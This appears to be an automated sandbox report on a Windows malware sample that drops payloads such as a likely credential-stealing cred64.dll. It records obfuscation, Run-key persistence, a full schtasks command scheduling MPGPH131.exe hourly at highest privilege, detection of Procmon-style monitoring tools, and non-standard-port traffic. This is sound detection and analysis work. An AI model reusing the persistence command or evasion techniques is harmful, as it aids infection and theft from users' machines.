Source: amert[1].exe.6.dr Static PE information: section name: .taggant
Source: amert.exe.6.dr Static PE information: section name:
Source: amert.exe.6.dr Static PE information: section name: .idata
Source: amert.exe.6.dr Static PE information: section name:
Source: amert.exe.6.dr Static PE information: section name: fbupybke
Source: amert.exe.6.dr Static PE information: section name: ejxqaids
Source: amert.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: ejwyeyni
Source: random[1].exe0.6.dr Static PE information: section name: zoeuqxwb
Source: c884f8452a.exe.6.dr Static PE information: section name:
Source: c884f8452a.exe.6.dr Static PE information: section name: .idata
Source: c884f8452a.exe.6.dr Static PE information: section name:
Source: c884f8452a.exe.6.dr Static PE information: section name: ejwyeyni
Source: c884f8452a.exe.6.dr Static PE information: section name: zoeuqxwb
Source: sarra[1].exe.6.dr Static PE information: section name:
Source: sarra[1].exe.6.dr Static PE information: section name: .idata
Source: sarra[1].exe.6.dr Static PE information: section name:
Source: sarra[1].exe.6.dr Static PE information: section name: oavneyqq
Source: sarra[1].exe.6.dr Static PE information: section name: ixcwzfpc
Source: chrosha.exe.14.dr Static PE information: section name:
Source: chrosha.exe.14.dr Static PE information: section name: .idata
Source: chrosha.exe.14.dr Static PE information: section name:
Source: chrosha.exe.14.dr Static PE information: section name: fbupybke
Source: chrosha.exe.14.dr Static PE information: section name: ejxqaids
Source: chrosha.exe.14.dr Static PE information: section name: .taggant
Source: RageMP131.exe.20.dr Static PE information: section name:
Source: RageMP131.exe.20.dr Static PE information: section name: .idata
Source: RageMP131.exe.20.dr Static PE information: section name:
Source: RageMP131.exe.20.dr Static PE information: section name: ejwyeyni
Source: RageMP131.exe.20.dr Static PE information: section name: zoeuqxwb
Source: MPGPH131.exe.20.dr Static PE information: section name:
Source: MPGPH131.exe.20.dr Static PE information: section name: .idata
Source: MPGPH131.exe.20.dr Static PE information: section name:
Source: MPGPH131.exe.20.dr Static PE information: section name: ejwyeyni
Source: MPGPH131.exe.20.dr Static PE information: section name: zoeuqxwb
Source: cred64[1].dll.50.dr Static PE information: section name: _RDATA
Source: cred64.dll.50.dr Static PE information: section name: _RDATA
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Code function: 0_2_00B929A0 push esp; ret 0_2_00B929A1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Code function: 0_2_00B89420 push ebx; ret 0_2_00B8942A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Code function: 0_2_00B88DE6 push esi; iretd 0_2_00B88DE7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Code function: 0_2_00B9EFBC push ecx; ret 0_2_00B9EFCF
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_0070C0E8 push cs; retn 0002h 2_2_0070C0E9
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00709420 push ebx; ret 2_2_0070942A
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00708DE6 push esi; iretd 2_2_00708DE7
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_0071EFBC push ecx; ret 2_2_0071EFCF
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 3_2_0070C0E8 push cs; retn 0002h 3_2_0070C0E9
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 3_2_00709420 push ebx; ret 3_2_0070942A
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 3_2_00708DE6 push esi; iretd 3_2_00708DE7
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 3_2_0071EFBC push ecx; ret 3_2_0071EFCF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FF848CB00BD pushad ; iretd 11_2_00007FF848CB00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FF848D8CACC push eax; retf 0000h 11_2_00007FF848D8CAD5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FF848D8CA9F push 140000C9h; retf 0000h 11_2_00007FF848D8CAB1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FF848D80DB9 push eax; ret 11_2_00007FF848D80DD9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FF848D8CF30 push eax; iretd 11_2_00007FF848D8CF61
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Code function: 14_2_0037D28C push ecx; ret 14_2_0037D29F
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Static PE information: section name: entropy: 7.974297481762842
Source: explorha.exe.0.dr Static PE information: section name: entropy: 7.974297481762842
Source: amert[1].exe.6.dr Static PE information: section name: entropy: 7.980367322356868
Source: amert[1].exe.6.dr Static PE information: section name: fbupybke entropy: 7.952909089297466
Source: amert.exe.6.dr Static PE information: section name: entropy: 7.980367322356868
Source: amert.exe.6.dr Static PE information: section name: fbupybke entropy: 7.952909089297466
Source: random[1].exe0.6.dr Static PE information: section name: entropy: 7.9276781775055
Source: random[1].exe0.6.dr Static PE information: section name: ejwyeyni entropy: 7.949249760690904
Source: c884f8452a.exe.6.dr Static PE information: section name: entropy: 7.9276781775055
Source: c884f8452a.exe.6.dr Static PE information: section name: ejwyeyni entropy: 7.949249760690904
Source: sarra[1].exe.6.dr Static PE information: section name: entropy: 7.927704281329572
Source: sarra[1].exe.6.dr Static PE information: section name: oavneyqq entropy: 7.951558451221909
Source: chrosha.exe.14.dr Static PE information: section name: entropy: 7.980367322356868
Source: chrosha.exe.14.dr Static PE information: section name: fbupybke entropy: 7.952909089297466
Source: RageMP131.exe.20.dr Static PE information: section name: entropy: 7.9276781775055
Source: RageMP131.exe.20.dr Static PE information: section name: ejwyeyni entropy: 7.949249760690904
Source: MPGPH131.exe.20.dr Static PE information: section name: entropy: 7.9276781775055
Source: MPGPH131.exe.20.dr Static PE information: section name: ejwyeyni entropy: 7.949249760690904
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cred64[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amert[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe File created: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\clip64[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe File created: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe File created: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe File created: C:\ProgramData\MPGPH131\MPGPH131.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe File created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe File created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe File created: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sarra[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe File created: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe File created: C:\ProgramData\MPGPH131\MPGPH131.exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 831840b410.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c884f8452a.exe Jump to behavior
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: Regmonclass
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Creates job files (autostart)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe File created: C:\Windows\Tasks\explorha.job Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 831840b410.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 831840b410.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c884f8452a.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c884f8452a.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49883 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 49883 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 49889 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 49889 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 49883
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 49889
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 49883
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 49889
Source: unknown Network traffic detected: HTTP traffic on port 49883 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 49889 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 49889
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 49883
Source: unknown Network traffic detected: HTTP traffic on port 49997 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 49998 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 49998 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 49997 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 49998
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 49997
Source: unknown Network traffic detected: HTTP traffic on port 50095 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 50094 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 49998
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 49997
Source: unknown Network traffic detected: HTTP traffic on port 50095 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 50094 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 50462 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 50461 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 50462 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 50461 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50094
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50095
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50094
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50095
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50094
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50095
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50094
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50095
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50094
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50095
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50094
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50461
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50462
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50461
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50462
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50461
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50462
Source: unknown Network traffic detected: HTTP traffic on port 50784 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 50785 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 50784 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 50785 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50784
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50785
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
